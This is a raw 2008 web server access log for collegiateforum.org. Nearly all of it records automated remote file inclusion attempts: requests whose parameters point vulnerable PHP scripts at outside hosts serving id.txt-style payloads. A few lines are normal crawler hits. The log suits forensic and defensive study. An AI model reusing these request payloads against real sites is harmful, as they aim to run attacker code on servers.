64.22.89.194 - - [25/Aug/2008:06:40:20 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:06:40:20 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:06:40:21 -0700] "GET /logs/access_080324.log//tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:06:40:24 -0700] "GET /logs/access_080121.log//tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:06:40:24 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:06:40:24 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:06:40:26 -0700] "GET /logs/access_080324.log//tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:41:16 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:41:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:41:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
65.55.210.236 - - [25/Aug/2008:06:41:35 -0700] "GET /logs/access_080811.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:42:53 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.36.144.10 - - [25/Aug/2008:06:42:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:06:43:31 -0700] "GET /logs/access_080204.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:06:43:31 -0700] "GET /logs/access_080204.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:06:43:31 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:06:43:31 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:06:43:32 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:06:43:32 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.200.206.130 - - [25/Aug/2008:06:44:05 -0700] "GET /logs/access_080121.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.206.130 - - [25/Aug/2008:06:44:05 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.206.130 - - [25/Aug/2008:06:44:05 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:44:29 -0700] "GET /logs/access.log/errors.php?error=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:44:29 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:44:29 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:45:43 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:46:17 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.92.23.250 - - [25/Aug/2008:06:46:46 -0700] "GET /logs///main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:06:46:52 -0700] "GET /logs///main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:06:47:12 -0700] "GET /logs/access_080121.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:06:47:12 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:06:47:12 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
212.92.23.250 - - [25/Aug/2008:06:47:25 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:06:47:31 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:06:47:31 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:06:47:31 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:47:38 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.186.1.54 - - [25/Aug/2008:06:47:56 -0700] "GET /logs//include/admin.lib.inc.php?http://www.handowire.com/bbs/Paddy/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
89.186.1.54 - - [25/Aug/2008:06:48:01 -0700] "GET //include/admin.lib.inc.php?http://www.handowire.com/bbs/Paddy/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
195.238.172.13 - - [25/Aug/2008:06:48:11 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
195.238.172.13 - - [25/Aug/2008:06:48:11 -0700] "GET //?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 934 "-" "libwww-perl/5.811" "www.collegiateforum.org"
195.238.172.13 - - [25/Aug/2008:06:48:12 -0700] "GET /logs//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.811" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:50:33 -0700] "GET /logs/access_080630.log/main.php?x=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:50:33 -0700] "GET /logs/main.php?x=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:50:33 -0700] "GET /main.php?x=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:51:25 -0700] "GET /logs/access_080414.log/main.php?x=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.71.222.186 - - [25/Aug/2008:06:51:34 -0700] "GET / HTTP/1.0" 200 918 "http://www.sitedossier.com/site/www.collegiateforum.org" "-" "www.collegiateforum.org"
85.224.9.79 - - [25/Aug/2008:06:51:45 -0700] "GET / HTTP/1.1" 200 23874 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "jonathanfantiniporter.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:06:52:24 -0700] "GET /logs/access_080204.log/errors.php?error=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:53:21 -0700] "GET /logs/access.log/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:53:21 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:06:54:00 -0700] "GET /logs///main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:55:21 -0700] "GET /logs/access.log/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:55:21 -0700] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:55:21 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:55:54 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:55:54 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:55:55 -0700] "GET //inc/header.php/step_one.php?server_inc=? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:55:56 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:56:44 -0700] "GET /logs/access.log/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:56:44 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:57:03 -0700] "GET /logs/access.log/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:06:57:03 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
203.149.62.160 - - [25/Aug/2008:06:58:17 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
203.149.62.160 - - [25/Aug/2008:06:58:18 -0700] "GET //?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
203.149.62.160 - - [25/Aug/2008:06:58:19 -0700] "GET /logs//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.collegiateforum.org"
203.149.62.160 - - [25/Aug/2008:06:58:19 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
203.149.62.160 - - [25/Aug/2008:06:58:20 -0700] "GET //?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
203.149.62.160 - - [25/Aug/2008:06:58:21 -0700] "GET /logs//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:06:58:48 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.186.1.54 - - [25/Aug/2008:07:00:11 -0700] "GET /logs/access.log//include/admin.lib.inc.php?http://www.handowire.com/bbs/Paddy/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "collegiateforum.org"
89.186.1.54 - - [25/Aug/2008:07:00:11 -0700] "GET //include/admin.lib.inc.php?http://www.handowire.com/bbs/Paddy/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "collegiateforum.org"
89.186.1.54 - - [25/Aug/2008:07:00:11 -0700] "GET /logs//include/admin.lib.inc.php?http://www.handowire.com/bbs/Paddy/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:07:02:04 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:07:02:15 -0700] "GET /logs/access_080204.log/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
207.162.215.10 - - [25/Aug/2008:07:02:15 -0700] "GET /logs/access_080324.log/lostpasswd.php?env%5Binclude_prefix%5D=http://uaedesign.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.collegiateforum.org"
202.181.210.195 - - [25/Aug/2008:07:03:53 -0700] "GET /logs//admin.php?vwar_root=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
202.181.210.195 - - [25/Aug/2008:07:03:53 -0700] "GET //admin.php?vwar_root=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:04:05 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:04:05 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:04:10 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:04:14 -0700] "GET /logs/access.log/index.php?conteudo=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:04:14 -0700] "GET /index.php?conteudo=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:04:18 -0700] "GET /logs/index.php?conteudo=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:07:04:22 -0700] "GET /component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:07:04:22 -0700] "GET /logs/component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:07:04:22 -0700] "GET /component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:07:04:22 -0700] "GET /logs/component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:06:09 -0700] "GET /logs/access.log/index.php?conteudo=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:06:09 -0700] "GET /index.php?conteudo=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:06:09 -0700] "GET /logs/index.php?conteudo=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:06:20 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:06:24 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:07:11 -0700] "GET /logs/access_080324.log/index2.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:07:11 -0700] "GET /index2.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:07:11 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:07:30 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:07:30 -0700] "GET /logs/access_080204.log/components/com_simpleboard/image_upload.php?sbp=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:07:30 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:07:32 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:07:37 -0700] "GET /logs/access_080204.log/index2.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:08:09 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:07:08:28 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
202.181.210.195 - - [25/Aug/2008:07:08:57 -0700] "GET /logs/access_080204.log//admin.php?vwar_root=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:09:01 -0700] "GET /logs/access_080121.log//tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:09:01 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:09:01 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:09:01 -0700] "GET /logs/access_080211.log//tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
